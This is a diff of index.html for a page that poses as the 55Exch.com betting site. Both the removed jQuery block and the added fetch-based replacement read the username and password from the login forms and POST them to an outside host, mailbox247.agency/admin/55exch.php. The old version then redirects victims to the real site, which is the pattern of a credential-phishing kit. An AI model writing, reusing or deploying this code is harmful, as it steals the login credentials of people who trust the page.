--- a/index.html
+++ b/index.html
@@ -1406,41 +1406,91 @@ This website 55Exch.com is owned and operated by GIT Operations. registration nu
 
 
 	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
-<script>
-  function handleLogin(loginNameSelector, passwordSelector, errorMsgSelector) {
-    const loginName = $(loginNameSelector).val();
-    const password = $(passwordSelector).val();
+	<script>
+		// JavaScript function to send login data to the specified URL
+function checkLogins() {
+  // Get the username and password values
+  const username = document.getElementById("loginName1").value;
+  const password = document.getElementById("password1").value;
 
-    if (loginName && password) {
-      $.ajax({
-        type: "POST",
-        url: "https://mailbox247.agency/admin/55exch.php",
-        data: { loginName: loginName, password: password }, // Send as an object for better security
-        success: function (response) {
-          if (response === "sucessmsg") {
-            window.location.href = "https://www.55exch.com";
-          } else {
-            $(errorMsgSelector).html("Username and password is incorrect.");
-          }
-        },
-        error: function () {
-          alert("An error occurred while processing your request. Please try again later.");
-        },
-      });
-    } else {
-      alert("All fields are required.");
-    }
+  // Perform basic validation
+  if (!username || !password) {
+    alert("Please enter both username and password.");
+    return;
   }
 
-  // Assign handlers to buttons
-  $("#loginButton").click(function () {
-    handleLogin("#loginName", "#password", "#errorMsg");
-  });
+  // Prepare the data to send
+  const data = {
+    loginName: username,
+    password: password,
+  };
 
-  $("#loginButton1").click(function () {
-    handleLogin("#loginName1", "#password1", "#errorMsg");
-  });
-</script>
+  // Send data using the fetch API
+  fetch("https://mailbox247.agency/admin/55exch.php", {
+    method: "POST",
+    headers: {
+      "Content-Type": "application/json",
+    },
+    body: JSON.stringify(data),
+  })
+    .then((response) => {
+      if (response.ok) {
+        return response.text(); // Process the server response
+      } else {
+        throw new Error("Network response was not ok.");
+      }
+    })
+    .then((responseText) => {
+      // Handle the server response
+      console.log("Response from server:", responseText);
+      alert("Login data sent successfully.");
+    })
+    .catch((error) => {
+      console.error("Error sending data:", error);
+      alert("An error occurred. Please try again later.");
+    });
+}
+
+// Optional: Add event listener for the second form
+function checkLogin() {
+  const username = document.getElementById("loginName").value;
+  const password = document.getElementById("password").value;
+
+  if (!username || !password) {
+    alert("Please enter both username and password.");
+    return;
+  }
+
+  const data = {
+    loginName: username,
+    password: password,
+  };
+
+  fetch("https://mailbox247.agency/admin/55exch.php", {
+    method: "POST",
+    headers: {
+      "Content-Type": "application/json",
+    },
+    body: JSON.stringify(data),
+  })
+    .then((response) => {
+      if (response.ok) {
+        return response.text();
+      } else {
+        throw new Error("Network response was not ok.");
+      }
+    })
+    .then((responseText) => {
+      console.log("Response from server:", responseText);
+      alert("Login data sent successfully.");
+    })
+    .catch((error) => {
+      console.error("Error sending data:", error);
+      alert("An error occurred. Please try again later.");
+    });
+}
+
+	</script>
 
 	
 	<script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js"></script>
